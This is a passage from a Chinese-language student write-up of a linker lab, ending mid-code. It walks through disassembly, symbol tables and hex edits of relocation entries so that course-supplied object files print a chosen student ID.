然后用 objdump 进行打印：

➜  [/home/ywhkkx/ex1.linklab/l2] objdump -d linkbomb2 

....................

00001215 <yeDfwUkv>:
    1215:	55                   	push   %ebp
    1216:	89 e5                	mov    %esp,%ebp
    1218:	53                   	push   %ebx
    1219:	83 ec 04             	sub    $0x4,%esp
    121c:	e8 9f fe ff ff       	call   10c0 <__x86.get_pc_thunk.bx>
    1221:	81 c3 b3 2d 00 00    	add    $0x2db3,%ebx
    1227:	83 ec 08             	sub    $0x8,%esp
    122a:	8d 83 a8 e0 ff ff    	lea    -0x1f58(%ebx),%eax
    1230:	50                   	push   %eax
    1231:	ff 75 08             	pushl  0x8(%ebp)
    1234:	e8 07 fe ff ff       	call   1040 <strcmp@plt> // strcmp
    1239:	83 c4 10             	add    $0x10,%esp
    123c:	85 c0                	test   %eax,%eax
    123e:	75 10                	jne    1250 <yeDfwUkv+0x3b> // strcmp 结果非 0（id 与 MYID 不同）时跳到函数末尾直接返回
    1240:	83 ec 0c             	sub    $0xc,%esp
    1243:	ff 75 08             	pushl  0x8(%ebp)
    1246:	e8 05 fe ff ff       	call   1050 <puts@plt> // printf的优化
    124b:	83 c4 10             	add    $0x10,%esp
    124e:	eb 01                	jmp    1251 <yeDfwUkv+0x3c>
    1250:	90                   	nop
    1251:	8b 5d fc             	mov    -0x4(%ebp),%ebx
    1254:	c9                   	leave  
    1255:	c3                   	ret

想要在 do_phase 中执行 OUTPUT_FUNC_NAME 并打印 ID，必须先传入参数 id；由于函数内部会执行“strcmp(id,MYID)”，只有 id 的内容与 MYID 相同才会打印，所以直接传入 MYID 字符串的地址即可

但是 MYID 的地址是变化的（PIE保护），不能直接获取其地址

但是在位置无关代码中，数据的地址是通过“GOT 基址 + 固定偏移”计算出来的，所以只需确定 MYID 相对于 GOT 基址的偏移

121c:	e8 9f fe ff ff       	call   10c0 <__x86.get_pc_thunk.bx> 
1221:	81 c3 b3 2d 00 00    	add    $0x2db3,%ebx 
    ............
122a:	8d 83 a8 e0 ff ff    	lea    -0x1f58(%ebx),%eax 
1230:	50                   	push   %eax 
1231:	ff 75 08             	pushl  0x8(%ebp)
1234:	e8 07 fe ff ff       	call   1040 <strcmp@plt> // strcmp

“121c”和“1221”这两步就是为了获取 GOT 表的基址，装入ebx

“122a”这一步用 lea 计算出相对 GOT 基址偏移为“-0x1f58”处的数据地址（只计算地址，不访问内存），装入eax

“1230”和“1231”这两步显然是把“strcmp”的参数压栈（MYID 和 id，从右往左依次入栈）

先压栈的 eax 就是“strcmp”的第二个参数 MYID ，反推得“-0x1f58”为 MYID 相对 GOT 基址的偏移，MYID的地址有了

可以在构思注入 do_phase 的汇编了：

.code32 // 不添加就会报错
lea -0x1f58(%eax), %eax
push %eax
call -86
pop %eax

查看二进制代码：

➜  [/home/ywhkkx/ex1.linklab/l2] gcc -c 2.s -o 2.o  
➜  [/home/ywhkkx/ex1.linklab/l2] objdump -d 2.o   

2.o：     文件格式 elf64-x86-64


Disassembly of section .text:

0000000000000000 <.text>:
   0:	8d 80 a8 e0 ff ff    	lea    -0x1f58(%rax),%eax
   6:	50                   	push   %rax
   7:	e8 00 00 00 00       	callq  0xc
   c:	58                   	pop    %rax

1
2
3

➜  [/home/ywhkkx/ex1.linklab/l2] gcc -m32 -o linkbomb2 main.o phase2.o 
➜  [/home/ywhkkx/ex1.linklab/l2] ./linkbomb2 
1180300330

成功了，最后再看一眼链接后的 linkbomb2

00001256 <do_phase>:
    1256:	55                   	push   %ebp
    1257:	89 e5                	mov    %esp,%ebp
    1259:	e8 b3 ff ff ff       	call   1211 <__x86.get_pc_thunk.ax>
    125e:	05 76 2d 00 00       	add    $0x2d76,%eax /* 因为链接,变具体了 */
        /* 新添 */
    1263:	8d 80 a8 e0 ff ff    	lea    -0x1f58(%eax),%eax 
    1269:	50                   	push   %eax
    126a:	e8 a6 ff ff ff       	call   1215 <yeDfwUkv>
    126f:	58                   	pop    %eax

实验三

创建生成一个名为 “phase3_patch.o” 的二进制可重定位目标文件，使其与 main.o phase3.o 链接后能够运行和输出（且仅输出）自己的学号

模块入口函数 do_phase() 依次遍历一个 COOKIE 字符串（由一组互不相同的英文字母组成，且总长度与学号字符串相同）中的每一字符，并通过一个映射数组将该字符的不同可能 ASCII 编码取值映射为输出字符

/* Lookup table indexed by a cookie character's byte value. It is
   intentionally left without an initializer in this module. */
char PHASE3_CODEBOOK[256];
/*
 * For each character of PHASE3_COOKIE (excluding the terminating NUL),
 * prints the byte that PHASE3_CODEBOOK maps it to, then a newline.
 */
void do_phase(){
        /* Fix: the listing read "const char char", a duplicated type
           specifier that does not compile. */
        const char cookie[] = PHASE3_COOKIE;
        for( int i=0; i<sizeof(cookie)-1; i++ )
                /* Cast to unsigned char so the index is never negative. */
                printf( "%c", PHASE3_CODEBOOK[ (unsigned char)(cookie[i]) ] );
        printf( "\n" );
}

分析 do_phase 函数反汇编指令，获知 COOKIE 字符串（保存于栈帧中的局部字符数组中）的组成内容和起始地址
定位循环结构，根据 cookie 中字符的使用，定位映射数组的引用位置，结合重定位记录，确定映射数组的变量名
通过符号表，发现该数组为一未初始化变量（类型为COM，长度为256字节）
要改变程序输出（为学号），必须改变该映射数组的内容，因此，可利用强弱全局符号的解析规则，在 patch 模块中定义同名且按输出要求正确初始化映射关系的数组变量——从而在链接时替换对原数组的引用

先执行文件：

1	➜ [/home/ywhkkx/ex1.linklab/l3] ./linkbomb3 // 打印了个寂寞

PHASE3_CODEBOOK 未知，没有进行初始化，如果我们想要让 do_phase 打印我们需要的数据，就需要另写一个重定位文件对 PHASE3_CODEBOOK 进行初始化

反汇编 linkbomb3 寻找 COOKIE ：

00001225 <do_phase>:
    1225:	55                   	push   %ebp
    1226:	89 e5                	mov    %esp,%ebp
    1228:	53                   	push   %ebx
    1229:	83 ec 24             	sub    $0x24,%esp
    122c:	e8 9f fe ff ff       	call   10d0 <__x86.get_pc_thunk.bx>
    1231:	81 c3 9f 2d 00 00    	add    $0x2d9f,%ebx
    1237:	65 a1 14 00 00 00    	mov    %gs:0x14,%eax
    123d:	89 45 f4             	mov    %eax,-0xc(%ebp)
    1240:	31 c0                	xor    %eax,%eax
    1242:	c7 45 e9 61 73 74 70 	movl   $0x70747361,-0x17(%ebp) // target
    1249:	c7 45 ed 71 72 77 68 	movl   $0x68777271,-0x13(%ebp) // target
    1250:	66 c7 45 f1 62 66    	movw   $0x6662,-0xf(%ebp) // target
    1256:	c6 45 f3 00          	movb   $0x0,-0xd(%ebp)
    125a:	c7 45 e4 00 00 00 00 	movl   $0x0,-0x1c(%ebp)
    1261:	eb 2b                	jmp    128e <do_phase+0x69>
    1263:	8d 55 e9             	lea    -0x17(%ebp),%edx
    1266:	8b 45 e4             	mov    -0x1c(%ebp),%eax
    1269:	01 d0                	add    %edx,%eax
    126b:	0f b6 00             	movzbl (%eax),%eax
    126e:	0f b6 c0             	movzbl %al,%eax
    1271:	8d 93 70 00 00 00    	lea    0x70(%ebx),%edx
    1277:	0f b6 04 02          	movzbl (%edx,%eax,1),%eax
    127b:	0f be c0             	movsbl %al,%eax
    127e:	83 ec 0c             	sub    $0xc,%esp
    1281:	50                   	push   %eax
    1282:	e8 e9 fd ff ff       	call   1070 <putchar@plt>
    1287:	83 c4 10             	add    $0x10,%esp
    128a:	83 45 e4 01          	addl   $0x1,-0x1c(%ebp)
    128e:	8b 45 e4             	mov    -0x1c(%ebp),%eax
    1291:	83 f8 09             	cmp    $0x9,%eax
    1294:	76 cd                	jbe    1263 <do_phase+0x3e>
    1296:	83 ec 0c             	sub    $0xc,%esp
    1299:	6a 0a                	push   $0xa
    129b:	e8 d0 fd ff ff       	call   1070 <putchar@plt>
    12a0:	83 c4 10             	add    $0x10,%esp
    12a3:	90                   	nop
    12a4:	8b 45 f4             	mov    -0xc(%ebp),%eax
    12a7:	65 33 05 14 00 00 00 	xor    %gs:0x14,%eax
    12ae:	74 05                	je     12b5 <do_phase+0x90>
    12b0:	e8 8b 00 00 00       	call   1340 <__stack_chk_fail_local>
    12b5:	8b 5d fc             	mov    -0x4(%ebp),%ebx
    12b8:	c9                   	leave  
    12b9:	c3                   	ret    
    12ba:	66 90                	xchg   %ax,%ax
    12bc:	66 90                	xchg   %ax,%ax
    12be:	66 90                	xchg   %ax,%ax

COOKIE 在栈中分配（看到与ebp有关的操作，和密之数字，基本猜到了）

1
2
3

1242:	c7 45 e9 61 73 74 70 	movl   $0x70747361,-0x17(%ebp) // target
1249:	c7 45 ed 71 72 77 68 	movl   $0x68777271,-0x13(%ebp) // target
1250:	66 c7 45 f1 62 66    	movw   $0x6662,-0xf(%ebp) // target

In [5]: a=[0x61,0x73,0x74,0x70,0x71,0x72,0x77,0x68,0x62,0x66]

In [6]: data=''

In [7]: for i in range(len(a)):
   ...:     data+=chr(a[i])

In [9]: data
Out[9]: 'astpqrwhbf'

再在 GDB 中看看：

1
2
3

04:0010│     0xffffcf00 ◂— 0x747361fc /* 'astp' >> 由于GDB被0xfc干扰,没有打印出来 */
05:0014│     0xffffcf04 ◂— 'pqrwhbf'
06:0018│     0xffffcf08 ◂— 0x666268 /* 'hbf' */

pwndbg> x/s 0xffffcf00+1
0xffffcf01: "astpqrwhbf"

文本中的 PHASE3_CODEBOOK 是弱符号（未初始化的全局变量），我们就在 phase3_patch.o 中定义一个强符号来替换它（强符号会优先被定义）

假设我们想让程序输出：YHellow209

➜  [/home/ywhkkx/ex1.linklab/l3] readelf -s phase3.o 

Symbol table '.symtab' contains 18 entries:
   Num:    Value  Size Type    Bind   Vis      Ndx Name
     0: 00000000     0 NOTYPE  LOCAL  DEFAULT  UND 
     1: 00000000     0 FILE    LOCAL  DEFAULT  ABS phase3.c
     2: 00000000     0 SECTION LOCAL  DEFAULT    2 
     3: 00000000     0 SECTION LOCAL  DEFAULT    4 
     4: 00000000     0 SECTION LOCAL  DEFAULT    5 
     5: 00000000     0 SECTION LOCAL  DEFAULT    6 
     6: 00000000     0 SECTION LOCAL  DEFAULT    8 
     7: 00000000     0 SECTION LOCAL  DEFAULT   10 
     8: 00000000     0 SECTION LOCAL  DEFAULT   11 
     9: 00000000     0 SECTION LOCAL  DEFAULT    9 
    10: 00000000     0 SECTION LOCAL  DEFAULT    1 
    11: 00000020   256 OBJECT  GLOBAL DEFAULT  COM cDBDohBAOo // 获取字符串名称
    12: 00000000   149 FUNC    GLOBAL DEFAULT    2 do_phase
    13: 00000000     0 FUNC    GLOBAL HIDDEN     8 __x86.get_pc_thunk.bx
    14: 00000000     0 NOTYPE  GLOBAL DEFAULT  UND _GLOBAL_OFFSET_TABLE_
    15: 00000000     0 NOTYPE  GLOBAL DEFAULT  UND putchar
    16: 00000000     0 NOTYPE  GLOBAL HIDDEN   UND __stack_chk_fail_local
    17: 00000000     4 OBJECT  GLOBAL DEFAULT    6 phase

1 2	char cDBDohBAOo[256] = "1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111Y01119121111111lloHe11w";

➜  [/home/ywhkkx/ex1.linklab/l3] gcc -m32 -c phase3_patch.c -o phase3_patch.o
➜  [/home/ywhkkx/ex1.linklab/l3] gcc -m32 -o linkbomb3 main.o phase3.o phase3_patch.o
➜  [/home/ywhkkx/ex1.linklab/l3] ./linkbomb3 
YHellow209

实验四

修改二进制可重定位目标文件 “phase4.o” 中相应节中的数据内容（注意不允许修改 .text 节的内容），使其与 main.o 链接后能够运行输出（且仅输出）自己的学号

本阶段学生所拿到的.o文件中的“重定位位置”信息已经被抹除，学生需要根据实际情况确认重定位的发生位置，并根据重定位类型对位置信息进行恢复

/*
 * Lab-handout sketch of phase 4 (illustrative only: the "…" line stands for
 * the elided cases and the quote characters are typographic, so it does not
 * compile as shown).
 *
 * Walks every character of the PHASE4_COOKIE string except its terminating
 * NUL, remaps it through the switch, and prints the remapped character.
 */
void do_phase()
{
        const char cookie[] = PHASE4_COOKIE; 
        char c;
        /* sizeof(cookie)-1 skips the terminating NUL of the string literal. */
        for ( int i = 0; i < sizeof(cookie)-1; i++ ) 
       {
                c = cookie[i];
                switch (c) 
                {
                      // The mapping and the order of the cases are meant to differ for every student.
                      case ‘A’: { c = 48; break; } 
                      case ‘B’: { c = 121; break; }
                        …
                      case ‘Z’: { c = 93; break; }
                }
               /* No default case is shown, so presumably an unmatched character is printed unchanged. */
               printf("%c", c);
        }
}

通过分析 do_phase 函数的反汇编程序获知 COOKIE 字符串（保存于栈帧中的局部字符数组中）的组成内容
确定 switch 跳转表在 .rodata 节中的偏移量（“A”，“B”，“C” …… 这些字符都在 .rodata 节中）
定位 COOKIE 中每一字符’c’在switch跳转表中的对应表项（索引为’c’-0x41），将其值设为输出目标学号中对应字符的 case 首指令的偏移量

直接运行：

➜  [/home/ywhkkx/ex1.linklab/l4] ./linkbomb4
wl0_TZb3vJ

和 实验三 一样的套路，只不过这个在外面包装了 switch-case

故技重施，先反汇编 linkbomb4 寻找 COOKIE ：

00001225 <do_phase>:
    1225:	55                   	push   %ebp
    1226:	89 e5                	mov    %esp,%ebp
    1228:	53                   	push   %ebx
    1229:	83 ec 24             	sub    $0x24,%esp
    122c:	e8 9f fe ff ff       	call   10d0 <__x86.get_pc_thunk.bx>
    1231:	81 c3 9f 2d 00 00    	add    $0x2d9f,%ebx
    1237:	65 a1 14 00 00 00    	mov    %gs:0x14,%eax
    123d:	89 45 f4             	mov    %eax,-0xc(%ebp)
    1240:	31 c0                	xor    %eax,%eax
    1242:	c7 45 e9 42 47 4f 4d 	movl   $0x4d4f4742,-0x17(%ebp) // target
    1249:	c7 45 ed 45 49 55 46 	movl   $0x46554945,-0x13(%ebp) // target
    1250:	66 c7 45 f1 51 4a    	movw   $0x4a51,-0xf(%ebp) // target
    1256:	c6 45 f3 00          	movb   $0x0,-0xd(%ebp)
    125a:	c7 45 e4 00 00 00 00 	movl   $0x0,-0x1c(%ebp)
    1261:	e9 e7 00 00 00       	jmp    134d <.L30+0x19>
    1266:	8d 55 e9             	lea    -0x17(%ebp),%edx
    1269:	8b 45 e4             	mov    -0x1c(%ebp),%eax
    126c:	01 d0                	add    %edx,%eax
    126e:	0f b6 00             	movzbl (%eax),%eax
    1271:	88 45 e3             	mov    %al,-0x1d(%ebp)
    1274:	0f be 45 e3          	movsbl -0x1d(%ebp),%eax
    1278:	83 e8 41             	sub    $0x41,%eax
    127b:	83 f8 19             	cmp    $0x19,%eax
    127e:	0f 87 b5 00 00 00    	ja     1339 <.L30+0x5>
    1284:	c1 e0 02             	shl    $0x2,%eax
    1287:	8b 84 18 ac e0 ff ff 	mov    -0x1f54(%eax,%ebx,1),%eax
    128e:	01 d8                	add    %ebx,%eax
    1290:	ff e0                	jmp    *%eax

这次直接在GDB中获取 COOKIE 了：

pwndbg> x/xs 0xffffcf00+1
0xffffcf01: "BGOMEIUFQJ"

在 Switch-Case 中：“BGOMEIUFQJ” 对应“跳转表”表项的顺序为：2 7 15 13 5 9 21 6 17 10

先看下汇编：

00001225 <do_phase>:
    1225:	55                   	push   %ebp
    1226:	89 e5                	mov    %esp,%ebp
    1228:	53                   	push   %ebx
    1229:	83 ec 24             	sub    $0x24,%esp
    122c:	e8 9f fe ff ff       	call   10d0 <__x86.get_pc_thunk.bx>
    1231:	81 c3 9f 2d 00 00    	add    $0x2d9f,%ebx
    1237:	65 a1 14 00 00 00    	mov    %gs:0x14,%eax
    123d:	89 45 f4             	mov    %eax,-0xc(%ebp)
    1240:	31 c0                	xor    %eax,%eax
    1242:	c7 45 e9 42 47 4f 4d 	movl   $0x4d4f4742,-0x17(%ebp)
    1249:	c7 45 ed 45 49 55 46 	movl   $0x46554945,-0x13(%ebp)
    1250:	66 c7 45 f1 51 4a    	movw   $0x4a51,-0xf(%ebp)
    1256:	c6 45 f3 00          	movb   $0x0,-0xd(%ebp)
    125a:	c7 45 e4 00 00 00 00 	movl   $0x0,-0x1c(%ebp)
    1261:	e9 e7 00 00 00       	jmp    134d <.L30+0x19>
    1266:	8d 55 e9             	lea    -0x17(%ebp),%edx
    1269:	8b 45 e4             	mov    -0x1c(%ebp),%eax
    126c:	01 d0                	add    %edx,%eax
    126e:	0f b6 00             	movzbl (%eax),%eax
    1271:	88 45 e3             	mov    %al,-0x1d(%ebp)
    1274:	0f be 45 e3          	movsbl -0x1d(%ebp),%eax
    1278:	83 e8 41             	sub    $0x41,%eax
    127b:	83 f8 19             	cmp    $0x19,%eax
    127e:	0f 87 b5 00 00 00    	ja     1339 <.L30+0x5>
    1284:	c1 e0 02             	shl    $0x2,%eax
    1287:	8b 84 18 ac e0 ff ff 	mov    -0x1f54(%eax,%ebx,1),%eax
    128e:	01 d8                	add    %ebx,%eax
    1290:	ff e0                	jmp    *%eax

00001292 <.L4>: 
    1292:	c6 45 e3 54          	movb   $0x54,-0x1d(%ebp) // A >> T
    1296:	e9 9e 00 00 00       	jmp    1339 <.L30+0x5>

0000129b <.L6>:
    129b:	c6 45 e3 77          	movb   $0x77,-0x1d(%ebp) // B >> w
    129f:	e9 95 00 00 00       	jmp    1339 <.L30+0x5>

000012a4 <.L7>:
    12a4:	c6 45 e3 70          	movb   $0x70,-0x1d(%ebp) // C >> p
    12a8:	e9 8c 00 00 00       	jmp    1339 <.L30+0x5>

000012ad <.L8>:
    12ad:	c6 45 e3 36          	movb   $0x36,-0x1d(%ebp) // D >> 6
    12b1:	e9 83 00 00 00       	jmp    1339 <.L30+0x5>

000012b6 <.L9>:
    12b6:	c6 45 e3 54          	movb   $0x54,-0x1d(%ebp) // E >> T
    12ba:	eb 7d                	jmp    1339 <.L30+0x5>

000012bc <.L10>:
    12bc:	c6 45 e3 33          	movb   $0x33,-0x1d(%ebp) // F >> 3
    12c0:	eb 77                	jmp    1339 <.L30+0x5>

000012c2 <.L11>:
    12c2:	c6 45 e3 6c          	movb   $0x6c,-0x1d(%ebp) // G >> l
    12c6:	eb 71                	jmp    1339 <.L30+0x5>

000012c8 <.L12>:
    12c8:	c6 45 e3 34          	movb   $0x34,-0x1d(%ebp) // H >> 4
    12cc:	eb 6b                	jmp    1339 <.L30+0x5>

000012ce <.L13>:
    12ce:	c6 45 e3 5a          	movb   $0x5a,-0x1d(%ebp) // I >> Z 
    12d2:	eb 65                	jmp    1339 <.L30+0x5>

000012d4 <.L14>:
    12d4:	c6 45 e3 4a          	movb   $0x4a,-0x1d(%ebp) // J >> J 
    12d8:	eb 5f                	jmp    1339 <.L30+0x5>

000012da <.L15>:
    12da:	c6 45 e3 51          	movb   $0x51,-0x1d(%ebp) // K >> Q
    12de:	eb 59                	jmp    1339 <.L30+0x5>

000012e0 <.L16>:
    12e0:	c6 45 e3 4d          	movb   $0x4d,-0x1d(%ebp) // L >> M
    12e4:	eb 53                	jmp    1339 <.L30+0x5>

000012e6 <.L17>:
    12e6:	c6 45 e3 5f          	movb   $0x5f,-0x1d(%ebp) // M >> _
    12ea:	eb 4d                	jmp    1339 <.L30+0x5>

000012ec <.L18>:
    12ec:	c6 45 e3 38          	movb   $0x38,-0x1d(%ebp) // N >> 8
    12f0:	eb 47                	jmp    1339 <.L30+0x5>

000012f2 <.L19>:
    12f2:	c6 45 e3 30          	movb   $0x30,-0x1d(%ebp) // O >> 0
    12f6:	eb 41                	jmp    1339 <.L30+0x5>

000012f8 <.L20>:
    12f8:	c6 45 e3 32          	movb   $0x32,-0x1d(%ebp) // P >> 2
    12fc:	eb 3b                	jmp    1339 <.L30+0x5>

000012fe <.L21>:
    12fe:	c6 45 e3 76          	movb   $0x76,-0x1d(%ebp) // Q >> v
    1302:	eb 35                	jmp    1339 <.L30+0x5>

00001304 <.L22>:
    1304:	c6 45 e3 35          	movb   $0x35,-0x1d(%ebp) // R >> 5
    1308:	eb 2f                	jmp    1339 <.L30+0x5>

0000130a <.L23>:
    130a:	c6 45 e3 3c          	movb   $0x3c,-0x1d(%ebp) // S >> <
    130e:	eb 29                	jmp    1339 <.L30+0x5>

00001310 <.L24>:
    1310:	c6 45 e3 39          	movb   $0x39,-0x1d(%ebp) // T >> 9
    1314:	eb 23                	jmp    1339 <.L30+0x5>

00001316 <.L25>:
    1316:	c6 45 e3 62          	movb   $0x62,-0x1d(%ebp) // U >> b
    131a:	eb 1d                	jmp    1339 <.L30+0x5>

0000131c <.L26>:
    131c:	c6 45 e3 57          	movb   $0x57,-0x1d(%ebp) // V >> W
    1320:	eb 17                	jmp    1339 <.L30+0x5>

00001322 <.L27>:
    1322:	c6 45 e3 60          	movb   $0x60,-0x1d(%ebp) // W >> `
    1326:	eb 11                	jmp    1339 <.L30+0x5>

00001328 <.L28>:
    1328:	c6 45 e3 4d          	movb   $0x4d,-0x1d(%ebp) // X >> M
    132c:	eb 0b                	jmp    1339 <.L30+0x5>

0000132e <.L29>:
    132e:	c6 45 e3 31          	movb   $0x31,-0x1d(%ebp) // Y >> 1
    1332:	eb 05                	jmp    1339 <.L30+0x5>

00001334 <.L30>:
    1334:	c6 45 e3 37          	movb   $0x37,-0x1d(%ebp) // Z >> 7
    1338:	90                   	nop
    1339:	0f be 45 e3          	movsbl -0x1d(%ebp),%eax
    133d:	83 ec 0c             	sub    $0xc,%esp
    1340:	50                   	push   %eax
    1341:	e8 2a fd ff ff       	call   1070 <putchar@plt>
    1346:	83 c4 10             	add    $0x10,%esp
    1349:	83 45 e4 01          	addl   $0x1,-0x1c(%ebp)
    134d:	8b 45 e4             	mov    -0x1c(%ebp),%eax
    1350:	83 f8 09             	cmp    $0x9,%eax
    1353:	0f 86 0d ff ff ff    	jbe    1266 <do_phase+0x41>
    1359:	83 ec 0c             	sub    $0xc,%esp
    135c:	6a 0a                	push   $0xa
    135e:	e8 0d fd ff ff       	call   1070 <putchar@plt>
    1363:	83 c4 10             	add    $0x10,%esp
    1366:	90                   	nop
    1367:	8b 45 f4             	mov    -0xc(%ebp),%eax
    136a:	65 33 05 14 00 00 00 	xor    %gs:0x14,%eax
    1371:	74 05                	je     1378 <.L30+0x44>
    1373:	e8 88 00 00 00       	call   1400 <__stack_chk_fail_local>
    1378:	8b 5d fc             	mov    -0x4(%ebp),%ebx
    137b:	c9                   	leave  
    137c:	c3                   	ret    
    137d:	66 90                	xchg   %ax,%ax
    137f:	90                   	nop

这些奇怪的 L4 L6 L7 就是字符了（主要是因为它们有26个）

“jmp 1339 <.L30+0x5>”应该就是“break”，可以通过 movb 来获取对应的打印数据（已标记）

实验四想要我们修改“phase4.o”，但不让我们修改 .text 节的内容（可执行指令的集合），所以我们只能改 .rodata 节中的“跳转表”

// 可采用以下代码证明：L4 L6 L7 就是 A，B，C，D ……

➜  [/home/ywhkkx/ex1.linklab/l4] readelf -s phase4.o
➜  [/home/ywhkkx/ex1.linklab/l4] readelf -S phase4.o

用 readelf 打印重定位节：

重定位节 '.rel.rodata' at offset 0x648 contains 26 entries:
 偏移量     信息    类型              符号值      符号名称
00000000  00000a09 R_386_GOTOFF      0000006d   .L4
00000004  00000b09 R_386_GOTOFF      00000076   .L6
00000008  00000c09 R_386_GOTOFF      0000007f   .L7
0000000c  00000d09 R_386_GOTOFF      00000088   .L8
00000010  00000e09 R_386_GOTOFF      00000091   .L9
00000014  00000f09 R_386_GOTOFF      00000097   .L10
00000018  00001009 R_386_GOTOFF      0000009d   .L11
0000001c  00001109 R_386_GOTOFF      000000a3   .L12
00000020  00001209 R_386_GOTOFF      000000a9   .L13
00000024  00001309 R_386_GOTOFF      000000af   .L14
00000028  00001409 R_386_GOTOFF      000000b5   .L15
0000002c  00001509 R_386_GOTOFF      000000bb   .L16
00000030  00001609 R_386_GOTOFF      000000c1   .L17
00000034  00001709 R_386_GOTOFF      000000c7   .L18
00000038  00001809 R_386_GOTOFF      000000cd   .L19
0000003c  00001909 R_386_GOTOFF      000000d3   .L20
00000040  00001a09 R_386_GOTOFF      000000d9   .L21
00000044  00001b09 R_386_GOTOFF      000000df   .L22
00000048  00001c09 R_386_GOTOFF      000000e5   .L23
0000004c  00001d09 R_386_GOTOFF      000000eb   .L24
00000050  00001e09 R_386_GOTOFF      000000f1   .L25
00000054  00001f09 R_386_GOTOFF      000000f7   .L26
00000058  00002009 R_386_GOTOFF      000000fd   .L27
0000005c  00002109 R_386_GOTOFF      00000103   .L28
00000060  00002209 R_386_GOTOFF      00000109   .L29
00000064  00002309 R_386_GOTOFF      0000010f   .L30

获取各个元素的节内偏移

➜  [/home/ywhkkx/ex1.linklab/l4] readelf -S phase4.o
There are 18 section headers, starting at offset 0x7cc:

节头：
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
  [ 0]                   NULL            00000000 000000 000000 00      0   0  0
  [ 1] .group            GROUP           00000000 000034 000008 04     15  39  4
  [ 2] .text             PROGBITS        00000000 00003c 000158 00  AX  0   0  1
  [ 3] .rel.text         REL             00000000 000618 000030 08   I 15   2  4
  [ 4] .data             PROGBITS        00000000 000194 000000 00  WA  0   0  1
  [ 5] .bss              NOBITS          00000000 000194 000000 00  WA  0   0  1
  [ 6] .rodata           PROGBITS        00000000 000194 000068 00   A  0   0  4
  [ 7] .rel.rodata       REL             00000000 000648 0000d0 08   I 15   6  4

“.rel.rodata”的偏移为“000648”。

现在可以用 hexedit 进行修改了，主要关注偏移为“000648”的地方，目的是交换’.rel.rodata’的信息，以改变重定位值，进而改变输出值：

00000640   4F 01 00 00  02 2A 00 00  00 00 00 00  09 0A 00 00  O....*..........
00000650   04 00 00 00  09 0B 00 00  08 00 00 00  09 0C 00 00  ................
00000660   0C 00 00 00  09 0D 00 00  10 00 00 00  09 0E 00 00  ................
00000670   14 00 00 00  09 0F 00 00  18 00 00 00  09 10 00 00  ................
00000680   1C 00 00 00  09 11 00 00  20 00 00 00  09 12 00 00  ........ .......

cookie：BGOMEIUFQJ
对应符号名称：L6 L11 L19 L17 L9 L13 L25 L10 L21 L14
原本的输出：wl0_TZb3vJ

假设我们想输出：0123456789

对应符号名称：L19 L29 L20 L10 L12 L22 L8 L30 L18 L24

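然后用 hexedit 做出调换：L6->L19，L11->L29，L19->L20 ……….

（注意：在下面修改后的数据中，偏移 0x30（对应字符 M）的表项被写成了“09 23”（即 .L30，输出 7），而按上面的对应关系应为“09 0F”（即 .L10，输出 3），所以实际运行输出的第 4 位是 7 而不是 3）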

00000640   4F 01 00 00  02 2A 00 00  00 00 00 00  09 0A 00 00  O....*..........
00000650   04 00 00 00  09 18 00 00  08 00 00 00  09 0C 00 00  ................
00000660   0C 00 00 00  09 0D 00 00  10 00 00 00  09 11 00 00  ................
00000670   14 00 00 00  09 23 00 00  18 00 00 00  09 22 00 00  .....#......."..
00000680   1C 00 00 00  09 11 00 00  20 00 00 00  09 1B 00 00  ........ .......
00000690   24 00 00 00  09 1D 00 00  28 00 00 00  09 14 00 00  $.......(.......
000006A0   2C 00 00 00  09 15 00 00  30 00 00 00  09 23 00 00  ,.......0....#..
000006B0   34 00 00 00  09 17 00 00  38 00 00 00  09 19 00 00  4.......8.......
000006C0   3C 00 00 00  09 19 00 00  40 00 00 00  09 17 00 00  <.......@.......
000006D0   44 00 00 00  09 1B 00 00  48 00 00 00  09 1C 00 00  D.......H.......
000006E0   4C 00 00 00  09 1D 00 00  50 00 00 00  09 0D 00 00  L.......P.......
000006F0   54 00 00 00  09 1F 00 00  58 00 00 00  09 20 00 00  T.......X.... ..
00000700   5C 00 00 00  09 21 00 00  60 00 00 00  09 22 00 00  \....!..`...."..
00000710   64 00 00 00  09 23 00 00  00 00 00 00  01 26 00 00  d....#.......&..

1
2
3

➜  [/home/ywhkkx/ex1.linklab/l4] gcc -m32 -o linkbomb4 main.o phase4.o
➜  [/home/ywhkkx/ex1.linklab/l4] ./linkbomb4                          
0127456789

实验五

修改二进制可重定位目标文件“phase5.o”的重定位节中的数据内容（不允许修改.text节的内容），补充完成其中被清零的一些重定位记录（分别对应于本模块中需要重定位的符号引用），使其与 main.o 链接后能够正确输出（且仅输出）自己学号

/*
 * Globals of the phase 5 handout. The initialisers are placeholders/macros
 * ("… …", FDICTDAT, MYID, PHASE5_COOKIE) whose values are not shown here.
 */
const int TRAN_ARRAY[] = {… …};  /* indexed by `mode` in transform_code() */
const char FDICT[] = FDICTDAT;   /* lookup table indexed by character value in encode() */
char BUF[] = MYID; 
char CODE = PHASE5_COOKIE;       /* running code byte, overwritten by generate_code() */

/*
 * Apply one transformation step to `code` and return the result.
 *
 * The low three bits of TRAN_ARRAY[mode] select the operation, and the same
 * array element is used as the operand. Only cases 0 and 1 are shown; the
 * "… …" line stands for the cases elided in the handout.
 */
int transform_code( int code, int mode )  {
    switch( TRAN_ARRAY [mode] & 0x00000007 )  {
        case 0:
            /* clear in `code` every bit that is set in the table entry */
            code = code & (~ TRAN_ARRAY[mode]);
            break;
        case 1:
            code = code ^ TRAN_ARRAY[mode];
            break;
        … …
    }
    return code;
}

/*
 * Seed the global CODE with `cookie`, then run it through transform_code()
 * once for every element of TRAN_ARRAY, using the element index as `mode`.
 *
 * CODE is declared as `char`, so both the seed and every intermediate result
 * are narrowed to a char when stored.
 */
void generate_code( int cookie )  {
    int i;
    CODE = cookie;
    /* sizeof(TRAN_ARRAY)/sizeof(int) is the element count of the table */
    for( i=0; i<sizeof(TRAN_ARRAY)/sizeof(int); i++ )
          CODE = transform_code( CODE, i );
}

/*
 * Encode the NUL-terminated string `str` in place and return its length.
 *
 * Each character is replaced by its FDICT entry XORed with CODE and masked
 * to 7 bits; results outside 0x20..0x7E are replaced by a space.
 *
 * NOTE(review): str[i] is used directly as the FDICT index, so a negative
 * char value or one beyond the table size would index outside FDICT.
 * The size of FDICT is not visible here; confirm.
 */
int encode( char* str )  {
    int i, n = strlen(str);
    for( i=0; i<n; i++ ) {
        str[i] = (FDICT[str[i]] ^ CODE) & 0x7F;
        /* keep the output within 0x20..0x7E */
